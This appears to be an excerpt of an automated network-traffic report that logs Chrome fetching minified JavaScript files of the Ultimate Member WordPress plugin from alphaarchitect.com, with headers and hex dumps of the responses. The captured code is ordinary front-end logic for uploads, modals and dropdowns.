                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 7b 69 66 28 79 2e 66 69 6c 65 44 61 74 61 21 3d 75 6e 64 65 66 69 6e 65 64 29 7b 45 2e 66 6f 72 6d 44 61 74 61 2e 61 70 70 65 6e 64 28 73 5b 44 5d 5b 30 5d 2c 73 5b 44 5d 5b 31 5d 29 7d 65 6c 73 65 7b 45 2e 64 61 74 61 5b 73 5b 44 5d 5b 30 5d 5d 3d 73 5b 44 5d 5b 31 5d 7d 7d 7d 7d 7d 41 2e 74 43 6f 75 6e 74 65 72 2b 3d 77 2e 6c 65 6e 67 74 68 3b 6a 28 29 3b 72 65 74 75 72 6e 21 30 7d 75 2e 73 74 61 74 75 73 62 61 72 2e 61 70 70 65 6e 64 28 22 3c 64 69 76 20 63 6c 61 73 73 3d 27 75 6d 2d 65 72 72 6f 72 2d 62 6c 6f 63 6b 27 3e 22 2b 79 2e 75 70 6c 6f 61 64 45 72 72 6f 72 53 74 72 2b 22 3c 2f 64 69 76 3e 22 29 3b 75 2e 63 61 6e 63 65 6c 2e 73 68 6f 77 28 29 3b 7a 2e 72 65 6d 6f 76 65 28 29 3b 75 2e 63 61 6e 63 65 6c 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                        Data Ascii: {if(y.fileData!=undefined){E.formData.append(s[D][0],s[D][1])}else{E.data[s[D][0]]=s[D][1]}}}}}A.tCounter+=w.length;j();return!0}u.statusbar.append("<div class='um-error-block'>"+y.uploadErrorStr+"</div>");u.cancel.show();z.remove();u.cancel.click(functio
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC529INData Raw: 28 29 3b 69 66 28 43 2e 73 74 61 74 75 73 54 65 78 74 3d 3d 22 61 62 6f 72 74 22 29 7b 75 2e 73 74 61 74 75 73 62 61 72 2e 68 69 64 65 28 22 73 6c 6f 77 22 29 2e 72 65 6d 6f 76 65 28 29 3b 68 28 79 2c 41 29 7d 65 6c 73 65 7b 79 2e 6f 6e 45 72 72 6f 72 2e 63 61 6c 6c 28 74 68 69 73 2c 77 2c 73 2c 42 29 3b 69 66 28 79 2e 73 68 6f 77 53 74 61 74 75 73 41 66 74 65 72 45 72 72 6f 72 29 7b 75 2e 70 72 6f 67 72 65 73 73 44 69 76 2e 68 69 64 65 28 29 3b 75 2e 73 74 61 74 75 73 62 61 72 2e 61 70 70 65 6e 64 28 22 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 75 6d 2d 65 72 72 6f 72 2d 62 6c 6f 63 6b 27 3e 45 52 52 4f 52 3a 20 22 2b 42 2b 22 3c 2f 73 70 61 6e 3e 22 29 7d 65 6c 73 65 7b 75 2e 73 74 61 74 75 73 62 61 72 2e 68 69 64 65 28 29 3b 75 2e 73 74 61 74 75 73 62 61
                                                                                                                                                                                                                                                                        Data Ascii: ();if(C.statusText=="abort"){u.statusbar.hide("slow").remove();h(y,A)}else{y.onError.call(this,w,s,B);if(y.showStatusAfterError){u.progressDiv.hide();u.statusbar.append("<span class='um-error-block'>ERROR: "+B+"</span>")}else{u.statusbar.hide();u.statusba
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        83192.168.2.449841141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC583OUTGET /wp-content/plugins/ultimate-member/assets/js/um-functions.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-2f8f"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 53989
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba0088b35e72-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC878INData Raw: 32 66 38 66 0d 0a 66 75 6e 63 74 69 6f 6e 20 55 4d 5f 64 6f 6d 65 6e 75 73 28 29 7b 6a 51 75 65 72 79 28 22 2e 75 6d 2d 64 72 6f 70 64 6f 77 6e 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 29 7b 55 4d 2e 64 72 6f 70 64 6f 77 6e 2e 73 65 74 50 6f 73 69 74 69 6f 6e 28 6f 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 55 4d 5f 63 68 65 63 6b 5f 70 61 73 73 77 6f 72 64 5f 6d 61 74 63 68 65 64 28 29 7b 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 6b 65 79 75 70 22 2c 22 69 6e 70 75 74 5b 64 61 74 61 2d 6b 65 79 3d 75 73 65 72 5f 70 61 73 73 77 6f 72 64 5d 2c 69 6e 70 75 74 5b 64 61 74 61 2d 6b 65 79 3d 63 6f 6e 66 69 72 6d 5f 75 73 65 72 5f 70 61 73 73 77 6f 72 64 5d 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 6a 51 75
                                                                                                                                                                                                                                                                        Data Ascii: 2f8ffunction UM_domenus(){jQuery(".um-dropdown").each(function(e,o){UM.dropdown.setPosition(o)})}function UM_check_password_matched(){jQuery(document).on("keyup","input[data-key=user_password],input[data-key=confirm_user_password]",function(e){var o=jQu
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 39 36 30 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 64 64 43 6c 61 73 73 28 22 75 69 6d 6f 62 33 34 30 22 29 29 3a 65 6c 65 6d 65 6e 74 5f 77 69 64 74 68 3c 3d 35 30 30 3f 28 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 33 34 30 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 35 30 30 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 38 30 30 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 39 36 30 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 64
                                                                                                                                                                                                                                                                        Data Ascii: jQuery(this).removeClass("uimob960"),jQuery(this).addClass("uimob340")):element_width<=500?(jQuery(this).removeClass("uimob340"),jQuery(this).removeClass("uimob500"),jQuery(this).removeClass("uimob800"),jQuery(this).removeClass("uimob960"),jQuery(this).ad
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 64 5f 68 65 6c 70 5f 74 65 78 74 22 29 3f 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 65 6c 70 22 3e 27 2b 64 2e 64 61 74 61 28 22 75 70 6c 6f 61 64 5f 68 65 6c 70 5f 74 65 78 74 22 29 2b 22 3c 2f 73 70 61 6e 3e 22 3a 22 22 2c 69 63 6f 6e 3d 64 2e 64 61 74 61 28 22 69 63 6f 6e 22 29 3f 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 3c 69 20 63 6c 61 73 73 3d 22 27 2b 64 2e 64 61 74 61 28 22 69 63 6f 6e 22 29 2b 27 22 3e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 27 3a 22 22 2c 75 70 6c 6f 61 64 5f 74 65 78 74 3d 64 2e 64 61 74 61 28 22 75 70 6c 6f 61 64 5f 74 65 78 74 22 29 3f 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 72 22 3e 27 2b 64 2e 64 61 74 61 28 22 75 70 6c 6f 61 64 5f 74 65 78 74 22 29 2b 22 3c 2f 73 70 61 6e 3e 22 3a 22 22 3b 76 61 72
                                                                                                                                                                                                                                                                        Data Ascii: d_help_text")?'<span class="help">'+d.data("upload_help_text")+"</span>":"",icon=d.data("icon")?'<span class="icon"><i class="'+d.data("icon")+'"></i></span>':"",upload_text=d.data("upload_text")?'<span class="str">'+d.data("upload_text")+"</span>":"";var
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 64 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 29 2e 66 69 6e 64 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 20 69 6d 67 22 29 2c 74 3d 64 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 29 2e 66 69 6e 64 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 22 29 2c 69 3d 6e 65 77 20 44 61 74 65 3b 61 2e 61 74 74 72 28 22 73 72 63 22 2c 6f 2e 75 72 6c 2b 22 3f 22 2b 69 2e 67 65 74 54 69 6d 65 28 29 29 2c 61 2e 64 61 74 61 28 22 66 69 6c 65 22 2c 6f 2e 66 69 6c 65 29 2c 61 2e 6f 6e 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 29 2e 66 69 6e 64 28 22 2e
                                                                                                                                                                                                                                                                        Data Ascii: d.parents(".um-modal-body").find(".um-single-image-preview img"),t=d.parents(".um-modal-body").find(".um-single-image-preview"),i=new Date;a.attr("src",o.url+"?"+i.getTime()),a.data("file",o.file),a.on("load",function(){d.parents(".um-modal-body").find(".
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 6d 61 78 46 69 6c 65 43 6f 75 6e 74 45 72 72 6f 72 53 74 72 3a 74 2e 64 61 74 61 28 22 6d 61 78 5f 66 69 6c 65 73 5f 65 72 72 6f 72 22 29 2c 6d 61 78 46 69 6c 65 43 6f 75 6e 74 3a 31 2c 73 68 6f 77 44 65 6c 65 74 65 3a 21 31 2c 73 68 6f 77 41 62 6f 72 74 3a 21 31 2c 73 68 6f 77 44 6f 6e 65 3a 21 31 2c 73 68 6f 77 46 69 6c 65 43 6f 75 6e 74 65 72 3a 21 31 2c 73 68 6f 77 53 74 61 74 75 73 41 66 74 65 72 53 75 63 63 65 73 73 3a 21 30 2c 6f 6e 53 75 62 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 6f 64 79 22 29 2e 66 69 6e 64 28 22 2e 75 6d 2d 65 72 72 6f 72 2d 62 6c 6f 63 6b 22 29 2e 72 65 6d 6f 76 65 28 29 7d 2c 6f 6e 53 75 63 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 61 29 7b
                                                                                                                                                                                                                                                                        Data Ascii: maxFileCountErrorStr:t.data("max_files_error"),maxFileCount:1,showDelete:!1,showAbort:!1,showDone:!1,showFileCounter:!1,showStatusAfterSuccess:!0,onSubmit:function(e){t.parents(".um-modal-body").find(".um-error-block").remove()},onSuccess:function(e,o,a){
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 29 7d 2c 6f 6e 45 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 6e 65 77 5f 6d 6f 64 61 6c 28 65 2c 6f 2c 61 2c 74 29 7b 76 61 72 20 69 2c 64 2c 73 2c 72 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 6f 76 65 72 6c 61 79 22 29 2c 72 3d 28 30 21 3d 3d 72 2e 6c 65 6e 67 74 68 26 26 28 72 2e 68 69 64 65 28 29 2c 72 2e 6e 65 78 74 28 22 2e 75 6d 2d 6d 6f 64 61 6c 22 29 2e 68 69 64 65 28 29 29 2c 55 4d 2e 63 6f 6d 6d 6f 6e 2e 74 69 70 73 79 2e 68 69 64 65 28 29 2c 55 4d 2e 64 72 6f 70 64 6f 77 6e 2e 68 69 64 65 41 6c 6c 28 29 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 2c 68 74 6d 6c 2c 74 65 78 74 61 72 65 61 22 29 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 22
                                                                                                                                                                                                                                                                        Data Ascii: )},onError:function(e){console.log(e)}})}function um_new_modal(e,o,a,t){var i,d,s,r=jQuery(".um-modal-overlay"),r=(0!==r.length&&(r.hide(),r.next(".um-modal").hide()),UM.common.tipsy.hide(),UM.dropdown.hideAll(),jQuery("body,html,textarea").css("overflow"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 69 67 68 74 2c 64 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 6d 6f 64 61 6c 3a 76 69 73 69 62 6c 65 22 29 2e 6e 6f 74 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 68 69 64 64 65 6e 22 29 2c 73 3d 64 2e 66 69 6e 64 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 6f 64 79 2e 70 68 6f 74 6f 3a 76 69 73 69 62 6c 65 22 29 3b 28 73 2e 6c 65 6e 67 74 68 7c 7c 64 2e 6c 65 6e 67 74 68 29 26 26 28 65 3d 28 69 2d 64 2e 69 6e 6e 65 72 48 65 69 67 68 74 28 29 29 2f 32 2b 22 70 78 22 2c 64 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 33 34 30 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 6d 6f 62 35 30 30 22 29 2c 73 2e 6c 65 6e 67 74 68 3f 28 73 3d 74 2d 36 30 2c 61 3d 69 2d 2e 32 35 2a 69 2c 28 6f 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 70 68 6f 74 6f
                                                                                                                                                                                                                                                                        Data Ascii: ight,d=jQuery(".um-modal:visible").not(".um-modal-hidden"),s=d.find(".um-modal-body.photo:visible");(s.length||d.length)&&(e=(i-d.innerHeight())/2+"px",d.removeClass("uimob340").removeClass("uimob500"),s.length?(s=t-60,a=i-.25*i,(o=jQuery(".um-modal-photo
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 2e 75 6d 2d 70 6f 70 75 70 22 29 29 2c 55 4d 2e 63 6f 6d 6d 6f 6e 2e 74 69 70 73 79 2e 68 69 64 65 28 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 6f 70 75 70 22 29 2e 65 6d 70 74 79 28 29 2e 72 65 6d 6f 76 65 28 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 6f 70 75 70 2d 6f 76 65 72 6c 61 79 22 29 2e 65 6d 70 74 79 28 29 2e 72 65 6d 6f 76 65 28 29 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 2c 68 74 6d 6c 22 29 2e 63 73 73 28 7b 6f 76 65 72 66 6c 6f 77 3a 22 61 75 74 6f 22 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 68 6f 77 5f 4d 6f 64 61 6c 28 65 29 7b 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 6f 70 75 70 2d 6f 76 65 72 6c 61 79 22 29 2e 6c 65 6e 67 74 68 26 26 28 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 6f 70 75 70 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22
                                                                                                                                                                                                                                                                        Data Ascii: .um-popup")),UM.common.tipsy.hide(),jQuery(".um-popup").empty().remove(),jQuery(".um-popup-overlay").empty().remove(),jQuery("body,html").css({overflow:"auto"}))}function show_Modal(e){jQuery(".um-popup-overlay").length&&(jQuery(".um-popup").removeClass("
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 29 3a 61 2e 73 69 62 6c 69 6e 67 73 28 22 61 22 29 2e 6c 65 6e 67 74 68 3f 61 2e 73 69 62 6c 69 6e 67 73 28 22 61 22 29 2e 66 69 72 73 74 28 29 3a 61 2e 70 61 72 65 6e 74 28 29 2c 75 3d 28 72 2e 61 64 64 43 6c 61 73 73 28 22 75 6d 2d 74 72 69 67 67 65 72 2d 6d 65 6e 75 2d 6f 6e 2d 22 2b 73 29 2c 30 29 2c 6e 3d 28 72 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2d 74 29 2f 32 2c 6c 3d 72 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 69 3d 72 2e 6f 66 66 73 65 74 28 29 3b 73 77 69 74 63 68 28 72 2e 69 73 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2d 70 68 6f 74 6f 22 29 26 26 28 6f 3d 72 2e 66 69 6e 64 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2d 70 68 6f 74 6f 2d 69 6d 67 22 29 2c 6c 3d 72 2e 63 6c 6f 73 65 73 74 28 22 64 69 76 2e 75 69 6d 6f 62 35 30 30 22 29 2e 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: ):a.siblings("a").length?a.siblings("a").first():a.parent(),u=(r.addClass("um-trigger-menu-on-"+s),0),n=(r.outerWidth()-t)/2,l=r.outerHeight(),i=r.offset();switch(r.is(".um-profile-photo")&&(o=r.find(".um-profile-photo-img"),l=r.closest("div.uimob500").le
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC353INData Raw: 73 68 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 3d 6a 51 75 65 72 79 28 65 29 3b 55 4d 2e 64 72 6f 70 64 6f 77 6e 2e 68 69 64 65 41 6c 6c 28 29 2c 55 4d 2e 64 72 6f 70 64 6f 77 6e 2e 73 65 74 50 6f 73 69 74 69 6f 6e 28 65 29 2c 65 2e 73 68 6f 77 28 29 7d 7d 2c 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 75 6d 2d 73 65 61 72 63 68 20 66 6f 72 6d 20 2a 22 29 2e 6f 6e 28 22 6b 65 79 70 72 65 73 73 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 31 33 3d 3d 65 2e 77 68 69 63 68 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 28 22 2e 75 6d 2d 73 65 61 72 63 68 20 66 6f 72 6d 22 29 2e 74 72 69 67 67 65 72 28 22 73 75 62 6d 69 74 22 29 2c 21 31 7d 29 2c 32 3d 3d 6a 51 75 65 72 79 28 22 69 6e 70 75 74 5b 64 61 74 61 2d 6b
                                                                                                                                                                                                                                                                        Data Ascii: show:function(e){e=jQuery(e);UM.dropdown.hideAll(),UM.dropdown.setPosition(e),e.show()}},jQuery(function(){jQuery(".um-search form *").on("keypress",function(e){if(13==e.which)return jQuery(".um-search form").trigger("submit"),!1}),2==jQuery("input[data-k


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        84192.168.2.449842141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC584OUTGET /wp-content/plugins/ultimate-member/assets/js/um-responsive.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-180"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147812
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba009cb742ec-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC391INData Raw: 31 38 30 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 75 6d 5f 72 65 73 70 6f 6e 73 69 76 65 28 29 2c 75 6d 5f 6d 6f 64 61 6c 5f 72 65 73 70 6f 6e 73 69 76 65 28 29 7d 29 2c 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 72 65 73 69 7a 65 22 2c 5f 2e 64 65 62 6f 75 6e 63 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 73 70 6f 6e 73 69 76 65 5f 4d 6f 64 61 6c 28 29 2c 77 70 2e 68 6f 6f 6b 73 2e 64 6f 41 63 74 69 6f 6e 28 22 75 6d 5f 77 69 6e 64 6f 77 5f 72 65 73 69 7a 65 22 29 2c 75 6d 5f 72 65 73 70 6f 6e 73 69 76 65 28 29 2c 75 6d 5f 6d 6f 64 61 6c 5f 72 65 73 70 6f 6e 73 69 76 65 28 29 7d 2c 33 30 30 29 29 2c 77 70 2e 68 6f 6f 6b 73 2e 61 64 64 41 63 74 69 6f 6e 28 22 75 6d 5f
                                                                                                                                                                                                                                                                        Data Ascii: 180jQuery(window).on("load",function(){um_responsive(),um_modal_responsive()}),jQuery(window).on("resize",_.debounce(function(){responsive_Modal(),wp.hooks.doAction("um_window_resize"),um_responsive(),um_modal_responsive()},300)),wp.hooks.addAction("um_
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        85192.168.2.449843141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC585OUTGET /wp-content/plugins/ultimate-member/assets/js/um-conditional.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-2603"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147812
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba01baf18c21-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
